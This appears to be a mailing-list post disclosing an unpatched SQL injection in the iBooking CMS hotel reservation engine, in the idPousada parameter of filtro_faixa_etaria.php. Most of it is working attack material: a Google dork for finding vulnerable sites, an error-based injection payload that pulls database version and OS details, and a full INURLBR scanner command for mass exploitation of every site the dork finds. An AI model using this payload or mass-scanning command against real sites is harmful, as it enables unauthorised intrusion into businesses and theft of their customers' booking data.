(0day) IBOOKING CMS - SQL INJECTION
From: INURL Brasil <inurlbr () gmail com>
*# VENTOR: * www.ibooking.com.br
*# Vulnerable versions:* ALL
*# File: * filtro_faixa_etaria.php
*# Parameter: * idPousada(GET)
*# DORK: * intext:"Desenvolvido por ibooking"
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
*# Description*
The vulnerable request is made through a javascript function found within
/motor-de-reservas
# Javascript code responsible for vulnerable request
$.ajax({
type: "GET",
url: "filtro_faixa_etaria.php",
data: "qtde_quartos=1&idPousada=61",
success: function(xml){
$("#filtro_faixa_etaria").html(xml);
}
});
*# URL Vulnerable:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61
*# POC:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)
*# Example:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
*# Return print:*
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png
*# Mass exploration using scanner INURLBR*
# Download: https://github.com/googleinurl/SCANNER-INURLBR
*# COMMAND*
*# SETTING DORK DE PESQUISA*
--dork 'YOU_DORK'
*# USE* --dork 'intext:"Desenvolvido por ibooking"'
*# SETTING OUTPUT FILE:*
*# USE* -s 'ibooking.txt'
*# SETTING STRING EXPLOIT GET:*
--exploit-get 'EXPLOIT_GET'
*# USE* --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
*# SETTING TYPE OF VALIDATION: *
*# USE* -t 3
The third type combine both first and second types: Then, of course, it
also establishes connection with the exploit through the get method.
The string get set in parameter --exploit-get It is injected directly in
the url:
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL:
http://www.target.br/index.php?id=1&file=conect.php
*# SETTING STRING OF VALIDATION:*
Specify the string to be used as validation script:
Exemplo: -a {string}
Usando: -a '<title>hello world</title>'
If the specific value is found in the target, it is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get
string
*# COMMAND FULL:*
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s
'ibooking.txt' --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
-t 3 -a 'INURLBR_VULN'
m/so